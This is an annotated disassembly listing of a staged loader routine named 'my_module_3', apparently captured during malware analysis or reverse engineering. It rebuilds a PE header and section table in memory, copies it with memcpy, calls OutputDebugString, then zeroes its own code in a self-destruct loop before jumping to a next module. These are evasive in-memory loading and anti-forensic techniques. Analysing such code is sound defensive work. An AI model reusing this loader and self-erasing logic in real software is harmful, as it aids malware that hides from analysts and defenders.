debug028:002309BC ; 0x80=RVA of Import Directory debug028:002309C4 B9 08 00 00 00 mov ecx, 8 debug028:002309C9 C1 E1 00 shl ecx, 0 debug028:002309CC 8B 55 E0 mov edx, [ebp-20h] debug028:002309CF C7 44 0A 7C 50 00 00 00 mov dword ptr [edx+ecx+7Ch], 50h ; size of Import Directory debug028:002309D7 B8 08 00 00 00 mov eax, 8 debug028:002309DC 6B C8 0C imul ecx, eax, 0Ch ; ecx=0x60 debug028:002309DF 8B 55 E0 mov edx, [ebp-20h] debug028:002309E2 C7 44 0A 78 00 20 00 00 mov dword ptr [edx+ecx+78h], 2000h ; 60+78=D8 debug028:002309E2 ; 0xD8=IAT debug028:002309EA B8 08 00 00 00 mov eax, 8 debug028:002309EF 6B C8 0C imul ecx, eax, 0Ch debug028:002309F2 8B 55 E0 mov edx, [ebp-20h] debug028:002309F5 C7 44 0A 7C 48 00 00 00 mov dword ptr [edx+ecx+7Ch], 48h ; size IAT debug028:002309FD B8 08 00 00 00 mov eax, 8 debug028:00230A02 6B C8 05 imul ecx, eax, 5 ; ecx=0x28 debug028:00230A05 8B 55 E0 mov edx, [ebp-20h] debug028:00230A08 C7 44 0A 78 00 80 00 00 mov dword ptr [edx+ecx+78h], 8000h ; 28+78=A0 debug028:00230A08 ; Base Relocation Table debug028:00230A10 B8 08 00 00 00 mov eax, 8 debug028:00230A15 6B C8 05 imul ecx, eax, 5 debug028:00230A18 8B 55 E0 mov edx, [ebp-20h] debug028:00230A1B C7 44 0A 7C 68 00 00 00 mov dword ptr [edx+ecx+7Ch], 68h debug028:00230A23 B8 08 00 00 00 mov eax, 8 debug028:00230A28 6B C8 00 imul ecx, eax, 0 debug028:00230A2B 8B 55 E0 mov edx, [ebp-20h] debug028:00230A2E C7 44 0A 78 00 00 00 00 mov dword ptr [edx+ecx+78h], 0 debug028:00230A36 50 push eax debug028:00230A37 E8 00 00 00 00 call $+5 debug028:00230A3C 58 pop eax debug028:00230A3D E9 A0 00 00 00 jmp loc_230AE2 debug028:00230A3D ; --------------------------------------------------------------------------- debug028:00230A42 2E 74 65 78 74 00 00 00 aText_0 db '.text',0,0,0 ; .text [name] debug028:00230A4A E8 0A 00 00 dd 0AE8h ; .text [virtualsize] debug028:00230A4E 00 10 00 00 dd 1000h ; .text [virtualaddress] debug028:00230A52 00 0C 00 00 dd 0C00h ; .text [sizeofrawdata] debug028:00230A56 00 04 00 00 00 00 00 00 00 00+db 0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,' ',0,0,'`' debug028:00230A6A 2E 72 64 61 74 61 00 00 aRdata_0 db '.rdata',0,0 ; .rdata [name] debug028:00230A72 4A 4C 00 00 dd 4C4Ah ; .rdata [virtualsize] debug028:00230A76 00 20 00 00 dd 2000h ; .rdata [virtualaddress] debug028:00230A7A 00 4E 00 00 dd 4E00h ; .rdata [sizeofrawdata] debug028:00230A7E 00 10 00 00 00 00 00 00 00 00+db 0,10h,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'@',0,0,'@' debug028:00230A92 2E 64 61 74 61 00 00 00 aData_0 db '.data',0,0,0 ; .data [name] debug028:00230A9A 38 00 00 00 dd 38h ; .data [virtualsize] debug028:00230A9E 00 70 00 00 dd 7000h ; .data [virtualaddress] debug028:00230AA2 00 02 00 00 dd 200h ; .data [sizeofrawdata] debug028:00230AA6 00 5E 00 00 00 00 00 00 00 00+db 0,'^',0,0,0,0,0,0,0,0,0,0,0,0,0,0,'@',0,0,'À' debug028:00230ABA 2E 72 65 6C 6F 63 00 00 aReloc db '.reloc',0,0 ; .reloc [name] debug028:00230AC2 68 00 00 00 dd 68h ; .reloc [virtualsize] debug028:00230AC6 00 80 00 00 dd 8000h ; .reloc [virtualaddress] debug028:00230ACA 00 02 00 00 dd 200h ; .reloc [sizeofrawdata] debug028:00230ACE 00 60 00 00 00 00 00 00 00 00+db 0,'`',0,0,0,0,0,0,0,0,0,0,0,0,0,0,'@',0,0,'B' debug028:00230AE2 ; --------------------------------------------------------------------------- debug028:00230AE2 debug028:00230AE2 loc_230AE2: ; CODE XREF: my_module_3+659↑j debug028:00230AE2 83 C0 03 add eax, 3 debug028:00230AE5 89 85 1C FF FF FF mov [ebp-0E4h], eax debug028:00230AEB 58 pop eax debug028:00230AEC 68 A0 00 00 00 push 0A0h debug028:00230AF1 8B 85 1C FF FF FF mov eax, [ebp-0E4h] debug028:00230AF7 50 push eax debug028:00230AF8 8B 4D E0 mov ecx, [ebp-20h] debug028:00230AFB 0F B7 51 14 movzx edx, word ptr [ecx+14h] debug028:00230AFF 8B 45 E0 mov eax, [ebp-20h] debug028:00230B02 8D 4C 10 18 lea ecx, [eax+edx+18h] debug028:00230B06 51 push ecx debug028:00230B07 FF 55 D0 call dword ptr [ebp-30h] ; call memcpy debug028:00230B0A 83 C4 0C add esp, 0Ch debug028:00230B0D C7 85 04 FF FF FF F0 15 40 00 mov dword ptr [ebp-0FCh], offset sub_4015F0 debug028:00230B17 50 push eax debug028:00230B18 E8 00 00 00 00 call $+5 debug028:00230B1D 58 pop eax debug028:00230B1E EB 08 jmp short loc_230B28 debug028:00230B1E ; --------------------------------------------------------------------------- debug028:00230B20 5A 78 6B 65 6E 70 5A 00 aZxkenpz_0 db 'ZxkenpZ',0 debug028:00230B28 ; --------------------------------------------------------------------------- debug028:00230B28 debug028:00230B28 loc_230B28: ; CODE XREF: my_module_3+73A↑j debug028:00230B28 83 C0 03 add eax, 3 debug028:00230B2B 89 85 14 FF FF FF mov [ebp-0ECh], eax debug028:00230B31 58 pop eax debug028:00230B32 8B 95 14 FF FF FF mov edx, [ebp-0ECh] debug028:00230B38 52 push edx debug028:00230B39 FF 95 0C FF FF FF call dword ptr [ebp-0F4h] ; call outputdebugstring debug028:00230B3F 50 push eax debug028:00230B40 E8 00 00 00 00 call $+5 debug028:00230B45 58 pop eax debug028:00230B46 89 45 A8 mov [ebp-58h], eax ; get current address debug028:00230B49 58 pop eax debug028:00230B4A debug028:00230B4A self_destruct: ; CODE XREF: my_module_3+77D↓j debug028:00230B4A 8B 45 A8 mov eax, [ebp-58h] debug028:00230B4D 3B 45 A4 cmp eax, [ebp-5Ch] ; start memory region debug028:00230B50 74 11 jz short end_self_destruct debug028:00230B52 8B 4D A8 mov ecx, [ebp-58h] debug028:00230B55 C6 01 00 mov byte ptr [ecx], 0 debug028:00230B58 8B 55 A8 mov edx, [ebp-58h] debug028:00230B5B 83 EA 01 sub edx, 1 debug028:00230B5E 89 55 A8 mov [ebp-58h], edx debug028:00230B61 EB E7 jmp short self_destruct debug028:00230B63 ; --------------------------------------------------------------------------- debug028:00230B63 debug028:00230B63 end_self_destruct: ; CODE XREF: my_module_3+76C↑j debug028:00230B63 8B 85 04 FF FF FF mov eax, [ebp-0FCh] debug028:00230B69 C9 leave debug028:00230B6A FF E0 jmp eax ; jump to module four debug028:00230B6A my_module_3 endp ; sp-analysis failed debug028:00230B6A debug028:00230B6A ; ---------------------------------------------------------------------------